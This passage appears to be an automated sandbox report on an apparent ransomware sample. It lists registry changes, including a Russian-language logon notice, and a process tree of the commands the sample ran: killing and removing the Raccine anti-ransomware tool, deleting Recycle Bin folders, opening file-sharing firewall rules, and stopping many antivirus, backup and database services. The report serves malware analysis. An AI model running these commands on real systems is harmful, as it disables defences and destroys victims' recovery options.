Token: SeDebugPrivilege	4348	taskkill.exe
Token: SeDebugPrivilege	4316	taskkill.exe
Token: SeDebugPrivilege	4388	taskkill.exe
Token: SeDebugPrivilege	4364	taskkill.exe
Token: SeDebugPrivilege	4284	taskkill.exe
Token: SeDebugPrivilege	4372	taskkill.exe
Token: SeDebugPrivilege	4300	taskkill.exe
Token: SeDebugPrivilege	4500	taskkill.exe
Token: SeDebugPrivilege	4484	taskkill.exe
Token: SeDebugPrivilege	4340	taskkill.exe
Token: SeDebugPrivilege	4292	taskkill.exe
Token: SeDebugPrivilege	4332	taskkill.exe
Token: SeDebugPrivilege	4556	taskkill.exe
Token: SeDebugPrivilege	4516	taskkill.exe
Token: SeDebugPrivilege	4260	taskkill.exe
Token: SeDebugPrivilege	4308	taskkill.exe
Token: SeDebugPrivilege	4460	taskkill.exe
Token: SeDebugPrivilege	4268	taskkill.exe
Token: SeDebugPrivilege	4692	taskkill.exe
Token: SeDebugPrivilege	4700	taskkill.exe
Token: SeDebugPrivilege	4324	taskkill.exe
Token: SeDebugPrivilege	4668	taskkill.exe
Token: SeDebugPrivilege	4628	taskkill.exe
Token: SeDebugPrivilege	4396	taskkill.exe
Token: SeDebugPrivilege	4548	taskkill.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeDebugPrivilege	4612	taskkill.exe
Token: SeDebugPrivilege	4652	taskkill.exe
Token: SeDebugPrivilege	4732	taskkill.exe
Token: SeDebugPrivilege	4660	taskkill.exe
Token: SeDebugPrivilege	4748	powershell.exe
Token: SeDebugPrivilege	4644	taskkill.exe
Token: SeDebugPrivilege	4580	taskkill.exe
Token: SeDebugPrivilege	4564	taskkill.exe
Token: SeDebugPrivilege	4684	taskkill.exe
Token: SeDebugPrivilege	4596	taskkill.exe
Token: SeDebugPrivilege	4532	taskkill.exe
Token: SeDebugPrivilege	4476	taskkill.exe
Token: SeDebugPrivilege	4724	taskkill.exe
Token: SeDebugPrivilege	4540	taskkill.exe
Token: SeDebugPrivilege	4708	taskkill.exe
Token: SeDebugPrivilege	4468	taskkill.exe
Token: SeDebugPrivilege	4604	taskkill.exe
Token: SeDebugPrivilege	4524	taskkill.exe
Token: SeDebugPrivilege	4636	taskkill.exe
Token: SeDebugPrivilege	4572	taskkill.exe
Token: SeDebugPrivilege	4588	taskkill.exe
Token: SeDebugPrivilege	4508	taskkill.exe
Token: SeDebugPrivilege	4676	taskkill.exe
Token: SeDebugPrivilege	4436	taskkill.exe
Token: SeDebugPrivilege	4444	taskkill.exe
Token: SeDebugPrivilege	4452	taskkill.exe
Token: SeDebugPrivilege	4492	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

description	pid	process	target process
PID 1820 wrote to memory of 1516	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 1820 wrote to memory of 1516	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 1820 wrote to memory of 1516	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 1820 wrote to memory of 1804	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	taskkill.exe
PID 1820 wrote to memory of 1804	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	taskkill.exe
PID 1820 wrote to memory of 1804	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	taskkill.exe
PID 1820 wrote to memory of 1432	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	reg.exe
PID 1820 wrote to memory of 1432	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	reg.exe
PID 1820 wrote to memory of 1432	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	reg.exe
PID 1820 wrote to memory of 1300	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	reg.exe
PID 1820 wrote to memory of 1300	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	reg.exe
PID 1820 wrote to memory of 1300	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	reg.exe
PID 1820 wrote to memory of 1404	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	schtasks.exe
PID 1820 wrote to memory of 1404	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	schtasks.exe
PID 1820 wrote to memory of 1404	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	schtasks.exe
PID 1820 wrote to memory of 1328	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	cmd.exe
PID 1820 wrote to memory of 1328	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	cmd.exe
PID 1820 wrote to memory of 1328	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	cmd.exe
PID 1820 wrote to memory of 940	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	cmd.exe
PID 1820 wrote to memory of 940	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	cmd.exe
PID 1820 wrote to memory of 940	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	cmd.exe
PID 1820 wrote to memory of 1760	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	netsh.exe
PID 1820 wrote to memory of 1760	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	netsh.exe
PID 1820 wrote to memory of 1760	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	netsh.exe
PID 1820 wrote to memory of 1748	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	netsh.exe
PID 1820 wrote to memory of 1748	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	netsh.exe
PID 1820 wrote to memory of 1748	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	netsh.exe
PID 1820 wrote to memory of 2016	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 2016	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 2016	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1276	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1276	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1276	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 976	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 976	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 976	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 900	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 900	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 900	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1752	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1752	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1752	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1556	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1556	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1556	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1720	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1720	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1720	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 776	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 776	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 776	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 1820 wrote to memory of 1168	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 1820 wrote to memory of 1168	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 1820 wrote to memory of 1168	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 1820 wrote to memory of 1736	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 1820 wrote to memory of 1736	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 1820 wrote to memory of 1736	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 1820 wrote to memory of 1724	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 1820 wrote to memory of 1724	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 1820 wrote to memory of 1724	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 1820 wrote to memory of 1780	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 1820 wrote to memory of 1780	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 1820 wrote to memory of 1780	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 1820 wrote to memory of 1292	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "У вас сложности с IT безопасностью?\r\n\r\nНаши специалисты Вам гарантировано помогут.\r\n\r\nДля этого напишите нам на почту - [email protected]"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
"C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe"
1⤵
- Modifies extensions of user files
- Windows security modification
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1516
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1804
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1300
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1432
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1404
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1328
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1760
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:1748
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:2016
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:940
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1276
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:976
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:900
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1752
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1556
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1720
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:776
- C:\Windows\system32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  PID:1168
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start Dnscache /y
    3⤵
    PID:1660
- C:\Windows\system32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:1736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:2096
- C:\Windows\system32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:1724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start FDResPub /y
    3⤵
    PID:2196
- C:\Windows\system32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  PID:1780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start SSDPSRV /y
    3⤵
    PID:2088
- C:\Windows\system32\net.exe
  "net.exe" start upnphost /y
  2⤵
  PID:1292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start upnphost /y
    3⤵
    PID:2080
- C:\Windows\system32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:1044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:2104
- C:\Windows\system32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:1180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:2120
- C:\Windows\system32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:1636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:2128
- C:\Windows\system32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:1812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:2112
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:2136
- C:\Windows\system32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:2180
- C:\Windows\system32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EhttpSrv /y
    3⤵
    PID:2152
- C:\Windows\system32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:1840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:2168
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:1608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:2144
- C:\Windows\system32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:1876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MMS /y
    3⤵
    PID:2160
- C:\Windows\system32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:1176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:2472
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:2068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:4000
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:2204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:4140
- C:\Windows\system32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:2228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:4172
- C:\Windows\system32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:2272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:4188
- C:\Windows\system32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:2248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:4164
- C:\Windows\system32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:2300
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:4196
- C:\Windows\system32\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:2328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ekrn /y
    3⤵
    PID:4204
- C:\Windows\system32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:2352
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:4212
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:2376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:4220
- C:\Windows\system32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:2408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:4228
- C:\Windows\system32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:2432
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mozyprobackup /y
    3⤵
    PID:3968
- C:\Windows\system32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:2444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:3952
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:2488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:3976
- C:\Windows\system32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:2532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:4048
- C:\Windows\system32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:2548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:3984
- C:\Windows\system32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:2592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EsgShKernel /y
    3⤵
    PID:3992
- C:\Windows\system32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:2608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:4116
- C:\Windows\system32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:2560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:4180
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:2656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:5176
- C:\Windows\system32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:2644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:4008
- C:\Windows\system32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:2688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:4016
- C:\Windows\system32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:1740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:7156
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:1972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:5620
- C:\Windows\system32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:2220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:5600
- C:\Windows\system32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:2176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:6316
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:2192
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:5668
- C:\Windows\system32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:1888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sms_site_sql_backup /y
    3⤵
    PID:6188
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:1168
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:6180
- C:\Windows\system32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfefire /y
    3⤵
    PID:6104
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:2212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:7404
- C:\Windows\system32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:1300
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:6288
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:752
- C:\Windows\system32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:1404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:6204
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:1328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL80 /y
    3⤵
    PID:2712
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:1804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamRESTSvc /y
    3⤵
    PID:4168
- C:\Windows\system32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:1420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:4424
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:2064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL57 /y
    3⤵
    PID:2252
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:1564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:6196
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:2244
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:7584
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:1672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:4208
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:3068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:2500
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:2296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:2836
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:3052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamMountSvc /y
    3⤵
    PID:2644
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:3044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:4180
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:3028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    3⤵
    PID:4216
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:3020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:3972
- C:\Windows\system32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:2324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sacsvr /y
    3⤵
    PID:6324
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:3012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeEngineService /y
    3⤵
    PID:2304
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:3004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper /y
    3⤵
    PID:2184
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:2996
- - C:\Windows\system32\net1.exe
